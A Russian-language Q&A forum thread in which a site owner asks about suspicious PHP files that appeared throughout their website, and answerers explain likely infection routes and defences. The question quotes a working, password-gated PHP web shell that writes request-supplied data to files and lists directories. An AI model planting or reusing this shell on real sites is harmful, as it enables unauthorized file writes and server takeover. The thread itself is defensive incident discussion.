@slaventium

Вирус на сайте?

Только что заметил, что на одном из сайтов, практически в каждом каталоге появились странные файлы с названием типа: image.php, include.php и т. д.

Вот типичное содержимое этих файлов:

<?php $r=$_REQUEST;$c=getcwd();$n=chr(32);print('468505ab9718d8c2205ea35d94f04668');if(md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){print($n.$c.$n);fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);print($n);print_r(scandir($c));}exit;?>


Интересная штука получается, которая влечет за собой вопросы:

1. Как оно туда попало? Неужели дырявый сайт?
2. Какими последствиями это грозит? Понятно, что эти файлы я удалил, пароли поменял.
  • Вопрос задан
  • 4771 просмотр
Пригласить эксперта
Ответы на вопрос 5
shanker
@shanker
судя по приведённому коду файла, это некий php-shell.
Может создавать файлы и записывать туда данные

Как попало? На этот вопрос могут ответить логи: смотрите кто к этим файлам обращался и с какого IP. Далее ищите этот IP во всех логах. Самые распространённые варианты:

1. кто-то украл пароли доступа к сайту
2. уязвимость в сткриптах веб-сервиса позволяющая удалённый аплоад файлов
3. уязвимость в сткриптах веб-сервиса позволяющая удалённый аплоад файлов через обращение к БД
Ответ написан
@Richard_Ferlow
Веб-программист
Самый простой способ — вирус крадет пароли от фтп и дальше уже закидывают вирус. бывают и более извращенные способы, в том числе со взломом сайта. Но через краденные пароли куда проще ведь. Фтп клиентом надо пользоваться таким, где пароли шифруются. ну и на вирусы проверить все компьютеры у кого доступ до внутренностей сайта есть.
Ответ написан
nochkin
@nochkin
1. Если используются какие-то Open Source проекты на php, то есть смысл посмотреть в плане обновлении версий.
2. Может грозить тем, что злоумышленник получает полный доступ на сайт и файлы.
Ответ написан
1) причиной могло быть заражение компьютера админа и т.п.
2) поставьте на контроль через www.siteguard.ru/
Ответ написан
@lubezniy
Ещё вариант (имел место быть на VPS Мастерхоста) — заражение через дыру в старой версии Plesk и установка разных закладок в сайты, а потом уже свободное проведение таких фокусов.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы